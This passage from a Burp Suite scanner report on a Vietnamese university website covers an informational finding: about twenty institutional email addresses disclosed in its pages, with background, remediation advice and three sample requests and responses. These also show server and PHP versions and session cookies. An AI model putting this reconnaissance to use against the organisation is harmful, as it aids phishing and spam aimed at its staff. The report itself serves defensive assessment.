Content-Length: 16489

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
9. Email addresses disclosed
Previous 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /

Issue detail

The following email addresses were disclosed in the response:
  • daihoctg@tgu.edu.vn
  • webmaster@tgu.edu.vn
  • ptaivu@tgu.edu.vn
  • ttthnn@tgu.edu.vn
  • pquantritb@tgu.edu.vn
  • info@vied.vn
  • tuyensinh@vied.vn
  • ttkhaothi@tgu.edu.vn
  • kktxd@tgu.edu.vn
  • ptchc@tgu.edu.vn
  • knncntp@tgu.edu.vn
  • pttpc@tgu.edu.vn
  • ksupham@tgu.edu.vn
  • tuyensinh@tgu.edu.vn
  • vanht@most.gov.vn
  • bmgdtcqp@tgu.edu.vn
  • kkhtn@tgu.edu.vn
  • pctsv@tgu.edu.vn
  • pqldt@tgu.edu.vn
  • kktl@tgu.edu.vn
Numerous email addresses were found to be disclosed and the above are a sample subset.

This issue was found in multiple locations under the reported path.

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

Consider removing any email addresses that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
To reduce the quantity of spam sent to anonymous mailbox addresses, consider hiding the email address and instead providing a form that generates the email server-side, protected by a CAPTCHA if necessary.

Vulnerability classifications

Request 1

GET /topic/?11387= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=vajug7ptns97blqrojb6jrfdi1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:42:40 GMT
Connection: close
Content-Length: 16489

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
</strong>: daihoctg@tgu.edu.vn</p>
...[SNIP]...
<p class="cus-font cus-font-size-foot">
M...i th..ng tin li..n quan .....n website, xin vui l..ng li..n h... theo .....a ch... Email: webmaster@tgu.edu.vn<br />
...[SNIP]...

Request 2

GET /dept/?7= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=6dq9h8q8fb17m85h8r0csi7ci1

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:41:38 GMT
Connection: close
Content-Length: 30010

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<br />
           Email: ptaivu@tgu.edu.vn</p>
...[SNIP]...

Request 3

GET /dept/?25= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=hhqrdc61tssv52p18nn7n6t6f7

Response 3

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:41:52 GMT
Connection: close
Content-Length: 23801

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<br />
           Email: ttthnn@tgu.edu.vn</p>
...[SNIP]...

Report generated by Burp Suite web vulnerability scanner v2.0beta, at Thu Oct 04 22:17:26 ICT 2018.